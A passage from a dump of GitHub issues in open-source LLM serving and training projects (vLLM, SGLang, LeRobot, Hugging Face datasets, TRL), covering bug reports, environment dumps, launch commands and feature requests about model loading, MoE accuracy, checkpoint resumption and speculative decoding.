INFO 01-04 14:48:04 [vllm.py:640] Asynchronous scheduling is enabled.\n(APIServer pid=116718) INFO 01-04 14:48:05 [scheduler.py:231] Chunked prefill is enabled with max_num_batched_tokens=8192.\n(EngineCore_DP0 pid=116936) INFO 01-04 14:48:12 [core.py:96] Initializing a V1 LLM engine (v0.13.0rc2.dev185+g00a8d7628) with config: model='amd/Mixtral-8x7B-Instruct-v0.1-FP8-KV', speculative_config=None, tokenizer='amd/Mixtral-8x7B-Instruct-v0.1-FP8-KV', skip_tokenizer_init=False, tokenizer_mode=auto, revision=None, tokenizer_revision=None, trust_remote_code=False, dtype=torch.bfloat16, max_seq_len=8192, download_dir=None, load_format=auto, tensor_parallel_size=2, pipeline_parallel_size=1, data_parallel_size=1, disable_custom_all_reduce=False, quantization=fp8, enforce_eager=False, kv_cache_dtype=auto, device_config=cuda, structured_outputs_config=StructuredOutputsConfig(backend='auto', disable_fallback=False, disable_any_whitespace=False, disable_additional_properties=False, reasoning_parser='', reasoning_parser_plugin='', enable_in_reasoning=False), observability_config=ObservabilityConfig(show_hidden_metrics_for_version=None, otlp_traces_endpoint=None, collect_detailed_traces=None, kv_cache_metrics=False, kv_cache_metrics_sample=0.01, cudagraph_metrics=False, enable_layerwise_nvtx_tracing=False, enable_mfu_metrics=False, enable_mm_processor_stats=False), seed=0, served_model_name=amd/Mixtral-8x7B-Instruct-v0.1-FP8-KV, enable_prefix_caching=True, enable_chunked_prefill=True, pooler_config=None, compilation_config={'level': None, 'mode': , 'debug_dump_path': None, 'cache_dir': '', 'compile_cache_save_format': 'binary', 'backend': 'inductor', 'custom_ops': ['none'], 'splitting_ops': ['vllm::unified_attention', 'vllm::unified_attention_with_output', 'vllm::unified_mla_attention', 'vllm::unified_mla_attention_with_output', 'vllm::mamba_mixer2', 'vllm::mamba_mixer', 'vllm::short_conv', 'vllm::linear_attention', 'vllm::plamo2_mamba_mixer', 'vllm::gdn_attention_core', 'vllm::kda_attention', 'vllm::sparse_attn_indexer'], 'compile_mm_encoder': False, 'compile_sizes': [], 'compile_ranges_split_points': [8192], 'inductor_compile_config': {'enable_auto_functionalized_v2': False, 'combo_kernels': True, 'benchmark_combo_kernel': True}, 'inductor_passes': {}, 'cudagraph_mode': , 'cudagraph_num_of_warmups': 1, 'cudagraph_capture_sizes': [1, 2, 4, 8, 16, 24, 32, 40, 48, 56, 64, 72, 80, 88, 96, 104, 112, 120, 128, 136, 144, 152, 160, 168, 176, 184, 192, 200, 208, 216, 224, 232, 240, 248, 256, 272, 288, 304, 320, 336, 352, 368, 384, 400, 416, 432, 448, 464, 480, 496, 512], 'cudagraph_copy_inputs': False, 'cudagraph_specialize_lora': True, 'use_inductor_graph_partition': False, 'pass_config': {'fuse_norm_quant': False, 'fuse_act_quant': False, 'fuse_attn_quant': False, 'eliminate_noops': True, 'enable_sp': False, 'fuse_gemm_comms': False, 'fuse_allreduce_rms': False}, 'max_cudagraph_capture_size': 512, 'dynamic_shapes_config': {'type': , 'evaluate_guards': False}, 'local_cache_dir': None}\n(EngineCore_DP0 pid=116936) WARNING 01-04 14:48:12 [multiproc_executor.py:882] Reducing Torch parallelism from 80 threads to 1 to avoid unnecessary CPU contention. Set OMP_NUM_THREADS in the external environment to tune this value as needed.\nINFO 01-04 14:48:20 [parallel_state.py:1214] world_size=2", "url": "https://github.com/vllm-project/vllm/issues/31683", "state": "open", "labels": [ "help wanted", "feature request" ], "created_at": "2026-01-04T14:53:38Z", "updated_at": "2026-01-04T14:53:43Z", "comments": 0, "user": "robertgshaw2-redhat" }, { "repo": "sgl-project/sglang", "number": 16362, "title": "[Bug] Deepseekv3.2 detect eos when reasonging", "body": "### Checklist\n\n- [x] I searched related issues but found no solution.\n- [x] The bug persists in the latest version.\n- [x] Issues without environment info and a minimal reproducible demo are hard to resolve and may receive no feedback.\n- [x] If this is not a bug report but a general question, please start a discussion at https://github.com/sgl-project/sglang/discussions. Otherwise, it will be closed.\n- [ ] Please use English. Otherwise, it will be closed.\n\n### Describe the bug\n\nWhen making reasoning requests under the deepseekv3.2 model, it was found that randomly, only the reasoning content appears, while both the context and function call contents are empty. The probability of this happening is about 1/5. My request expects a function call to be returned.\nDuring debugging, it was discovered that an EOS was detected during the reasoning phase. Is there a convenient way to replace the EOS with ?\n\n### Reproduction\n\n/\n\n### Environment\n\n/", "url": "https://github.com/sgl-project/sglang/issues/16362", "state": "open", "labels": [], "created_at": "2026-01-04T02:43:14Z", "updated_at": "2026-01-04T02:43:14Z", "comments": 0, "user": "duzeyan" }, { "repo": "vllm-project/vllm", "number": 31646, "title": "[Usage]: How can I use GPU12 as standalone KV LMCache?", "body": "### Your current environment\n\n```text\nCollecting environment information...\nuv is set\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.3 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collect\nCMake version : Could not collect\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.3 (main, Nov 6 2025, 13:44:16) [GCC 13.3.0] (64-bit runtime)\nPython platform : Linux-6.8.12-13-pve-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.61\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : \nGPU 0: NVIDIA GeForce RTX 3090\nGPU 1: NVIDIA GeForce RTX 3090\nGPU 2: NVIDIA GeForce RTX 3090\nGPU 3: NVIDIA GeForce RTX 3090\nGPU 4: NVIDIA GeForce RTX 3090\nGPU 5: NVIDIA GeForce RTX 3090\nGPU 6: NVIDIA GeForce RTX 3090\nGPU 7: NVIDIA GeForce RTX 3090\nGPU 8: NVIDIA GeForce RTX 3090\nGPU 9: NVIDIA GeForce RTX 3090\nGPU 10: NVIDIA GeForce RTX 3090\nGPU 11: NVIDIA GeForce RTX 3090\nGPU 12: NVIDIA GeForce RTX 3090\n\nNvidia driver version : 570.172.08\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 43 bits physical, 48 bits virtual\nByte Order: Little Endian\nCPU(s): 64\nOn-line CPU(s) list: 0-9,11,13-24,26-50,52-63\nOff-line CPU(s) list: 10,12,25,51\nVendor ID: AuthenticAMD\nBIOS Vendor ID: Advanced Micro Devices, Inc.\nModel name: AMD EPYC 7532 32-Core Processor\nBIOS Model name: AMD EPYC 7532 32-Core Processor Unknown CPU @ 2.4GHz\nBIOS CPU family: 107\nCPU family: 23\nModel: 49\nThread(s) per core: 2\nCore(s) per socket: 32\nSocket(s): 1\nStepping: 0\nFrequency boost: enabled\nCPU(s) scaling MHz: 120%\nCPU max MHz: 2400.0000\nCPU min MHz: 1500.0000\nBogoMIPS: 4799.61\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc cpuid extd_apicid aperfmperf rapl pni pclmulqdq monitor ssse3 fma cx16 sse4_1 sse4_2 movbe popcnt aes xsave avx f16c rdrand lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs skinit wdt tce topoext perfctr_core perfctr_nb bpext perfctr_llc mwaitx cpb cat_l3 cdp_l3 hw_pstate ssbd mba ibrs ibpb stibp vmmcall fsgsbase bmi1 avx2 smep bmi2 cqm rdt_a rdseed adx smap clflushopt clwb sha_ni xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local clzero irperf xsaveerptr rdpru wbnoinvd arat npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold avic v_vmsave_vmload vgif v_spec_ctrl umip rdpid overflow_recov succor smca sev sev_es\nVirtualization: AMD-V\nL1d cache: 1 MiB (32 instances)\nL1i cache: 1 MiB (32 instances)\nL2 cache: 16 MiB (32 instances)\nL3 cache: 256 MiB (16 instances)\nNUMA node(s): 1\nNUMA node0 CPU(s): 0-63\nVulnerability Gather data sampling: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Mitigation; untrained return thunk; SMT enabled with STIBP protection\nVulnerability Spec rstack overflow: Mitigation; Safe RET\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl\nVulnerability Spectre v1: ", "url": "https://github.com/vllm-project/vllm/issues/31646", "state": "open", "labels": [ "usage" ], "created_at": "2026-01-03T13:25:41Z", "updated_at": "2026-01-03T13:25:41Z", "comments": 0, "user": "joshuakoh1" }, { "repo": "vllm-project/vllm", "number": 31624, "title": "[Bug]: ModelOpt Llama-4 Checkpoints Take 5+ minutes to load", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nIn working on some MoE refactors, I discovered that L4 for ModelOpt takes 5+minutes to load weights even from CPU page cache. \n- https://huggingface.co/nvidia/Llama-4-Scout-17B-16E-Instruct-FP8\n\nThe root cause is basically this hack logic to load the state dict that ModelOpt uses\n- https://github.com/vllm-project/vllm/blob/main/vllm/model_executor/models/llama4.py#L439-L523 [modelopt is the fused case] \n\nWhat happens is that the CPU tensor (loaded weight) that we are going to load into the GPU tensor (param) becomes non-contiguous due to this logic. As a result, when we eventually call `_copy()` from CPU->GPU we are calling this on a non-contiguous cpu tensor which takes 3-4s per weight.\n\nTo hack around this for local R&D, I simply immediately move the loaded_weight to the GPU. This makes the gather happen on the GPU which accelerates things a lot. This isn't reasonable as an actual solution though\n\nWe should investigate where the logic in the weight loader can avoid creating non-contiguous CPU tensors\n\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31624", "state": "open", "labels": [ "bug", "help wanted", "good first issue", "feature request" ], "created_at": "2026-01-02T15:18:14Z", "updated_at": "2026-01-06T02:42:32Z", "comments": 6, "user": "robertgshaw2-redhat" }, { "repo": "huggingface/lerobot", "number": 2741, "title": "XVLA: Clarification on provided lerobot/xvla-base model checkpoint and documentation", "body": "### Ticket Type\n\n\u2753 Technical Question\n\n### Environment & System Info\n\n```Shell\n\n```\n\n### Description\n\nDear lerobot-Team,\n\nI hope you had a good start into 2026 and thanks for the great work on making X-VLA natively available via lerobot.\nI have a few questions regarding the _lerobot/xvla-base_ checkpoint and the information provided in the [documentation](https://huggingface.co/docs/lerobot/en/xvla#-base-model) about it:\n\n1. You write in the documentation that the checkpoint has been trained with a two-stage approach:\n\n> A 0.9B parameter instantiation of X-VLA, trained with a carefully designed data processing and learning recipe. The training pipeline consists of two phases:\nPhase I: Pretraining - Pretrained on 290K episodes from Droid, Robomind, and Agibot, spanning seven platforms across five types of robotic arms (single-arm to bi-manual setups). By leveraging soft prompts to absorb embodiment-specific variations, the model learns an embodiment-agnostic generalist policy.\nPhase II: Domain Adaptation - Adapted to deployable policies for target domains. A new set of soft prompts is introduced and optimized to encode the hardware configuration of the novel domain, while the pretrained backbone remains frozen.\n\nI was now wondering whether _lerobot/xvla-base_ has really been trained with domain adaptation already or whether it has only been pre-trained as described in the X-VLA paper, i.e. with 290k trajectories of DROID, Robomind etc. If this is the case, it might be clearer to update the documentation to remove Phase II to avoid confusion. If _lerobot/xvla-base_ has really been trained on Domain Adaptation already, could you please explain why this was done for a base checkpoint and which datasets/ training hyperparams were chosen for this (this is not detailed in the paper).\n\n2. You mention [here](https://huggingface.co/docs/lerobot/en/xvla#2-domain-ids) that _lerobot/xvla-base_ has been trained on the following domain_ids:\n\n> \n\nDataset Name | Domain ID\n-- | --\nBridge | 0\nRT1 | 1\nCalvin | 2\nlibero | 3\nwidowx-air | 4\nAIR-AGILEX-HQ | 5\nrobotwin2_abs_ee | 6\nrobotwin2_clean | 6\nrobocasa-human | 7\nVLABench | 8\nAGIBOT-challenge | 9\nAIR-AGILEX | 10\nAIRBOT | 18\n\n\n\n\n\nI was wondering whether this is correct because I expected _lerobot/xvla-base_ (as described in 1.) to have been pre-trained on DROID, RoboMind and Agibot. Based on the [original code base](https://github.com/2toinf/X-VLA/blob/main/datasets/domain_config.py), i would have expected that it was pretrained on the following domain_ids:\n \n```\n# pretraining\n \"robomind-franka\": 11,\n \"robomind-ur\": 12,\n \"Droid-Left\": 13,\n \"Droid-Right\": 14,\n \"AGIBOT\": 15,\n \"robomind-agilex\": 16,\n \"robomind-franka-dual\": 17\n```\n\nIs it possible that in the documentation the pretraining and finetuning datasets/ domain ids got mixed up? Or is my understanding simply incorrect? If the pretraining and finetuning domain ids really got mixed up, would it make more sense to choose one of the pretraining domain ids (e.g. 13) when fine-tuning _lerobot/xvla_ with tasks collected on a setup very similar to DROID ?\n\nThank you very much for your response!\n\n### Context & Reproduction\n\n_No response_\n\n### Relevant logs or stack trace\n\n```Shell\n\n```\n\n### Checklist\n\n- [ ] I have searched existing tickets to ensure this isn't a duplicate.\n- [ ] I am using the latest version of the `main` branch.\n- [ ] I have verified this is not an environment-specific problem.\n\n### Additional Info / Workarounds\n\n_No response_", "url": "https://github.com/huggingface/lerobot/issues/2741", "state": "open", "labels": [ "documentation", "question", "policies", "dataset", "training" ], "created_at": "2026-01-02T08:38:03Z", "updated_at": "2026-01-04T15:54:55Z", "user": "gianlucageraci" }, { "repo": "huggingface/datasets", "number": 7927, "title": "Using Stateful Dataloader with Split Dataset By Node and DCP for DDP", "body": "### Describe the bug\n\nI am trying to determine how to save and load the Stateful Dataloader State with DCP and Split Dataset by Node for DDP.\n\nCurrently, I am running into the issue where I am receiving a slow resume.\n```\nNeither dataset nor iter(dataset) defines state_dict/load_state_dict so we are naively fast-forwarding your dataset by 5000 steps. For more efficient resumes, please implement `state_dict` and `load_state_dict` in your IterableDataset and/or iterator.\n```\n\n### Steps to reproduce the bug\n\nSay we have a streaming dataset:\n```python\nclass StreamingDataset(IterableDataset):\n def __init__(\n self,\n path: str,\n tokenizer: AutoTokenizer,\n name: Optional[str] = None,\n split: str = \"train\",\n max_length: int = 2048,\n ddp_rank: int = 0,\n ddp_world_size: int = 1,\n ):\n dataset = load_dataset(path, name, split=split, streaming=True)\n self.train_dataset = split_dataset_by_node(\n dataset=dataset, rank=ddp_rank, world_size=ddp_world_size\n )\n\n self.tokenizer = tokenizer\n self.max_length = max_length\n\n def __iter__(self):\n for sample in iter(self.train_dataset):\n tokenized = self.tokenizer(\n sample[\"text\"],\n padding=\"max_length\",\n truncation=True,\n max_length=self.max_length,\n return_special_tokens_mask=True,\n )\n yield tokenized\n```\nWe load that dataset into the Stateful Dataloader:\n```python\n trainloader = StatefulDataLoader(\n dataset=train_dataset,\n batch_size=args.batch_size,\n collate_fn=data_collator,\n )\n```\nWe then have code for checkpointing and resuming the state using DCP:\n```python\nimport os\nfrom typing import Optional\n\nimport torch\nimport torch.distributed as dist\nimport torch.distributed.checkpoint as dcp\nfrom torch.distributed.checkpoint.format_utils import dcp_to_torch_save\nfrom torch.distributed.checkpoint.state_dict import get_state_dict, set_state_dict\n\nfrom blitzbert.utils import print_rank_0\n\n\nclass Checkpoint:\n def __init__(\n self,\n model: torch.nn.Module,\n optimizer: torch.optim.Optimizer,\n trainloader,\n step: Optional[int] = None,\n epoch: Optional[int] = None,\n ):\n self.model = model\n self.optimizer = optimizer\n self.trainloader = trainloader\n self.step = step\n self.epoch = epoch\n\n def get_state_dict(self) -> dict:\n model_state_dict, optimizer_state_dict = get_state_dict(\n self.model, self.optimizer\n )\n return {\n \"model\": model_state_dict,\n \"optim\": optimizer_state_dict,\n \"trainloader\": self.trainloader.state_dict(),\n \"step\": self.step,\n \"epoch\": self.epoch,\n }\n\n\ndef save_checkpoint(\n args,\n model,\n optimizer,\n trainloader,\n step: Optional[int] = None,\n epoch: Optional[int] = None,\n final_checkpoint: bool = False,\n):\n checkpointer = Checkpoint(\n model=model,\n optimizer=optimizer,\n trainloader=trainloader,\n step=step,\n epoch=epoch,\n )\n\n state_dict = checkpointer.get_state_dict()\n\n if final_checkpoint:\n print_rank_0(\"Saving final model\")\n \n save_path = os.path.join(args.checkpoint_dir, \"final_model\")\n \n dcp.save(state_dict, checkpoint_id=save_path)\n dist.barrier()\n\n single_file_path = os.path.join(args.checkpoint_dir, \"final_checkpoint.pth\")\n dcp_to_torch_save(save_path, single_file_path)\n else:\n if step % args.checkpointing_steps == 0 and step != 0:\n print_rank_0(f\"Saving model at step: {step}\")\n save_path = os.path.join(args.checkpoint_dir, f\"epoch_{epoch}_step_{step}\")\n dcp.save(state_dict, checkpoint_id=save_path)\n dist.barrier()\n\n\ndef load_checkpoint(args, model, optimizer, trainloader):\n if not args.resume_from_checkpoint:\n return 0, 0\n\n checkpoint_path = args.resume_from_checkpoint\n print_rank_0(f\"Resumed from checkpoint: {checkpoint_path}\")\n \n checkpointer = Checkpoint(\n model=model,\n optimizer=optimizer,\n trainloader=trainloader,\n )\n\n state_dict = checkpointer.get_state_dict()\n\n dcp.load(\n state_dict=state_dict,\n checkpoint_id=checkpoint_path,\n )\n\n set_state_dict(\n model,\n optimizer,\n model_state_dict=state_dict[\"model\"],\n optim_state_dict=state_dict[\"optim\"],\n )\n\n trainloader.load_state_dict(state_dict[\"trainloader\"])\n \n step = state_dict[\"step\"]\n epoch = state_dict[\"epoch\"]\n\n return step, epoch\n```\nand then loading the checkpoint:\n```python\n completed_steps, current_epoch = load_checkpoint(\n args=args, model=model, optimizer=optimizer, trainloader=trainloader\n )\n```\n\n### Expected behavior\n\nIf I implement what the warning says:\n```python\n ", "url": "https://github.com/huggingface/datasets/issues/7927", "state": "open", "labels": [], "created_at": "2026-01-01T22:27:07Z", "updated_at": "2026-01-02T02:48:21Z", "comments": 2, "user": "conceptofmind" }, { "repo": "vllm-project/vllm", "number": 31609, "title": "[Bug][ModelOpt]: FlashInfer CUTLASS MoE Accuracy Degraded (Llama4)", "body": "### Your current environment\n\nH100, B200 ---> vllm 0.13.0\n\n### \ud83d\udc1b Describe the bug\n\n- running the following:\n\n```bash\n\n# modelopt\nMODEL_TENSOR := \"nvidia/Llama-4-Scout-17B-16E-Instruct-FP8\"\n\nGPUS := \"2\"\nPORT := \"8001\"\n\n\n# sm90 / sm100\nlaunch_cutlass_tensor:\n\tVLLM_USE_DEEP_GEMM=0 VLLM_USE_FLASHINFER_MOE_FP8=1 VLLM_FLASHINFER_MOE_BACKEND=throughput vllm serve {{MODEL_TENSOR}} -tp {{GPUS}} --port {{PORT}} --max-model-len 8192\n\n\n# sm100\nlaunch_trtllm_tensor:\n\tVLLM_USE_DEEP_GEMM=0 VLLM_USE_FLASHINFER_MOE_FP8=1 VLLM_FLASHINFER_MOE_BACKEND=latency chg run --gpus {{GPUS}} -- vllm serve {{MODEL_TENSOR}} -tp {{GPUS}} --max-model-len 8192\n\neval_block:\n\tlm_eval \\\n\t\t--model local-completions \\\n\t\t--tasks gsm8k \\\n\t\t--model_args \"model={{MODEL_BLOCK}},base_url=http://localhost:{{PORT}}/v1/completions,num_concurrent=1000,tokenized_requests=False\"\n\neval_tensor:\n\tlm_eval \\\n\t\t--model local-completions \\\n\t\t--tasks gsm8k \\\n\t\t--model_args \"model={{MODEL_TENSOR}},base_url=http://localhost:{{PORT}}/v1/completions,num_concurrent=1000,tokenized_requests=False\"\n```\n\nwith cutlass:\n\n```bash\nlocal-completions (model=nvidia/Llama-4-Scout-17B-16E-Instruct-FP8,base_url=http://localhost:8001/v1/completions,num_concurrent=1000,tokenized_requests=False), gen_kwargs: (None), limit: None, num_fewshot: None, batch_size: 1\n|Tasks|Version| Filter |n-shot| Metric | |Value | |Stderr|\n|-----|------:|----------------|-----:|-----------|---|-----:|---|-----:|\n|gsm8k| 3|flexible-extract| 5|exact_match|\u2191 |0.7491|\u00b1 |0.0119|\n| | |strict-match | 5|exact_match|\u2191 |0.7672|\u00b1 |0.0116|\n```\n\nwith trtllm:\n\n```bash\nlocal-completions (model=nvidia/Llama-4-Scout-17B-16E-Instruct-FP8,base_url=http://localhost:8000/v1/completions,num_concurrent=1000,tokenized_requests=False), gen_kwargs: (None), limit: None, num_fewshot: None, batch_size: 1\n|Tasks|Version| Filter |n-shot| Metric | |Value | |Stderr|\n|-----|------:|----------------|-----:|-----------|---|-----:|---|-----:|\n|gsm8k| 3|flexible-extract| 5|exact_match|\u2191 |0.9242|\u00b1 |0.0073|\n| | |strict-match | 5|exact_match|\u2191 |0.9075|\u00b1 |0.0080|\n```\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31609", "state": "closed", "labels": [ "bug", "help wanted" ], "created_at": "2026-01-01T21:45:48Z", "updated_at": "2026-01-03T20:26:38Z", "comments": 2, "user": "robertgshaw2-redhat" }, { "repo": "huggingface/trl", "number": 4766, "title": "Asynchronous generation and training for GRPO?", "body": "### Feature request\n\nGRPOTrainer send requests for the next batch to vllm server when it is computing backpropagation, in order to reduce idle runtime for both server's GPUs and trainer's GPUs.\n\n### Motivation\n\nUnder the current GRPO trainer, generation and backpropagation are sequential, meaning that lots of runtime are wasted. Considering that they are using different GPUs on server setting, it'd be beneficial to do generation at the same time when backpropagation is in computation. This requires the vllm trainer to send requests for next batch when running the current batch, and providing suggestion for the ratio of trainer / server GPU counts.\n\n### Your contribution\n\nSubmit PR in the future.", "url": "https://github.com/huggingface/trl/issues/4766", "state": "open", "labels": [], "created_at": "2026-01-01T08:42:12Z", "updated_at": "2026-01-01T08:42:12Z", "comments": 0, "user": "sxndqc" }, { "repo": "vllm-project/vllm", "number": 31574, "title": "[Usage]: If vllm surpport load LoRA adapter and DeepSeek-v3.1-termunis at the same time", "body": "### Your current environment\n\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0\nClang version : Could not collect\nCMake version : version 3.22.1\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.12 (main, Oct 10 2025, 08:52:57) [GCC 11.4.0] (64-bit runtime)\nPython platform : Linux-5.10.134-16.3.al8.x86_64-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.9.86\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : \nGPU 0: NVIDIA H20-3e\nGPU 1: NVIDIA H20-3e\nGPU 2: NVIDIA H20-3e\nGPU 3: NVIDIA H20-3e\nGPU 4: NVIDIA H20-3e\nGPU 5: NVIDIA H20-3e\nGPU 6: NVIDIA H20-3e\nGPU 7: NVIDIA H20-3e\n\nNvidia driver version : 570.133.20\ncuDNN version : Probably one of the following:\n/usr/lib/x86_64-linux-gnu/libcudnn.so.9.17.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv.so.9.17.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn.so.9.17.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_precompiled.so.9.17.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_runtime_compiled.so.9.17.0\n/usr/lib/x86_64-linux-gnu/libcudnn_graph.so.9.17.0\n/usr/lib/x86_64-linux-gnu/libcudnn_heuristic.so.9.17.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops.so.9.17.0\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 52 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 192\nOn-line CPU(s) list: 0-191\nVendor ID: GenuineIntel\nBIOS Vendor ID: Intel(R) Corporation\nModel name: INTEL(R) XEON(R) PLATINUM 8575C\nBIOS Model name: INTEL(R) XEON(R) PLATINUM 8575C\nCPU family: 6\nModel: 207\nThread(s) per core: 2\nCore(s) per socket: 48\nSocket(s): 2\nStepping: 2\nCPU max MHz: 4000.0000\nCPU min MHz: 800.0000\nBogoMIPS: 5600.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 invpcid_single cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow vnmi flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local split_lock_detect avx_vnni avx512_bf16 wbnoinvd dtherm ida arat pln pts hwp hwp_notify hwp_act_window hwp_epp hwp_pkg_req hfi avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm uintr md_clear serialize tsxldtrk pconfig arch_lbr amx_bf16 avx512_fp16 amx_tile amx_int8 flush_l1d arch_capabilities\nVirtualization: VT-x\nL1d cache: 4.5 MiB (96 instances)\nL1i cache: 3 MiB (96 instances)\nL2 cache: 192 MiB (96 instances)\nL3 cache: 640 MiB (2 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-47,96-143\nNUMA node1 CPU(s): 48-95,144-191\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl and seccomp\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user point", "url": "https://github.com/vllm-project/vllm/issues/31574", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-31T10:33:52Z", "updated_at": "2026-01-01T07:09:51Z", "comments": 1, "user": "AIR-hl" }, { "repo": "sgl-project/sglang", "number": 16220, "title": "GLM pd disaggregation with mtp", "body": "did glm support pd disaggregation and mtp? i try to test,but the accept len in log is always 1(failed to predict everytime) and performance is bad.i use the start command below,is there something wrong?\n\n\nargs for prefill node :\nSGLANG_ENABLE_SPEC_V2=1 SGLANG_DISAGGREGATION_QUEUE_SIZE=1 SGLANG_DISAGGREGATION_THREAD_POOL_SIZE=1 MC_TE_METRIC=1 SGLANG_SET_CPU_AFFINITY=true python -m sglang.launch_server --model /models/GLM-4.6-FP8/ --trust-remote-code --watchdog-timeout \"1000000\" --mem-fraction-static 0.8 --max-running-requests 40 --disaggregation-mode prefill --tp-size 8 --kv-cache-dtype fp8_e4m3 --host 0.0.0.0 --chunked-prefill-size 16384 --attention-backend fa3 --enable-metrics --disaggregation-ib-device mlx5_0 --page-size 64 --speculative-algorithm NEXTN --speculative-num-steps 3 --speculative-eagle-topk 1 --speculative-num-draft-tokens 4\n\nargs for decode node:\nSGLANG_ENABLE_SPEC_V2=1 SGLANG_CLIP_MAX_NEW_TOKENS_ESTIMATION=512 SGLANG_SET_CPU_AFFINITY=true python -m sglang.launch_server --model /models/GLM-4.6-FP8/ --trust-remote-code --watchdog-timeout \"1000000\" --mem-fraction-static 0.9 --tp-size 8 --kv-cache-dtype fp8_e4m3 --disaggregation-mode decode --prefill-round-robin-balance --host 0.0.0.0 --chunked-prefill-size 16384 --attention-backend fa3 --max-running-requests 80 --enable-metrics --disaggregation-ib-device mlx5_0 --page-size 64 --speculative-algorithm NEXTN --speculative-num-steps 3 --speculative-eagle-topk 1 --speculative-num-draft-tokens 4", "url": "https://github.com/sgl-project/sglang/issues/16220", "state": "open", "labels": [], "created_at": "2025-12-31T10:19:04Z", "updated_at": "2026-01-04T01:52:56Z", "comments": 1, "user": "dongliangwu" }, { "repo": "vllm-project/vllm", "number": 31567, "title": "[RFC]: Why custom_mask is not exposed on FlashInfer to get more flexible use case?", "body": "### Motivation.\n\nLike what tensorrt-llm does https://github.com/NVIDIA/TensorRT-LLM/blob/6c1abf2d45c77d04121ebe10f6b29abf89373c60/tensorrt_llm/_torch/attention_backend/flashinfer.py#L411C17-L411C28\n\n### Proposed Change.\n\nexpose the custom_weight to support use case like relative attention bias\n\n### Feedback Period.\n\n_No response_\n\n### CC List.\n\n_No response_\n\n### Any Other Things.\n\n_No response_\n\n### Before submitting a new issue...\n\n- 